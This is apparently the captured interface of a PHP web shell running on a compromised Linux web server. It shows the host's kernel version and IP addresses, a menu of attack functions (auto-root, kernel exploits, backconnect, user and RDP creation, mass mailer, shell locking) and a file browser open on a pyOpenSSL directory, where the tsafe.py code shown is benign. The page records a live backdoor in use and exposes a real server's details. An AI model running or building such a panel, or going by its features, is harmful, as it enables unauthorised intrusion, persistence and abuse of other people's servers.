Linux linux7.web4world.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
: 199.38.113.107 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
?5.6.40
siddhapu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
lib64 /
python2.7 /
site-packages /
OpenSSL /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
test
[ DIR ]
drwxr-xr-x
SSL.so
67.02
KB
-rwxr-xr-x
__init__.py
965
B
-rw-r--r--
__init__.pyc
951
B
-rw-r--r--
__init__.pyo
951
B
-rw-r--r--
crypto.so
96.98
KB
-rwxr-xr-x
rand.so
13.13
KB
-rwxr-xr-x
tsafe.py
1010
B
-rw-r--r--
tsafe.pyc
1.62
KB
-rw-r--r--
tsafe.pyo
1.62
KB
-rw-r--r--
version.py
178
B
-rw-r--r--
version.pyc
255
B
-rw-r--r--
version.pyo
255
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tsafe.py
from OpenSSL import SSL _ssl = SSL del SSL import threading _RLock = threading.RLock del threading class Connection: def __init__(self, *args): self._ssl_conn = apply(_ssl.Connection, args) self._lock = _RLock() for f in ('get_context', 'pending', 'send', 'write', 'recv', 'read', 'renegotiate', 'bind', 'listen', 'connect', 'accept', 'setblocking', 'fileno', 'shutdown', 'close', 'get_cipher_list', 'getpeername', 'getsockname', 'getsockopt', 'setsockopt', 'makefile', 'get_app_data', 'set_app_data', 'state_string', 'sock_shutdown', 'get_peer_certificate', 'get_peer_cert_chain', 'want_read', 'want_write', 'set_connect_state', 'set_accept_state', 'connect_ex', 'sendall'): exec("""def %s(self, *args): self._lock.acquire() try: return self._ssl_conn.%s(*args) finally: self._lock.release()\n""" % (f, f))
Close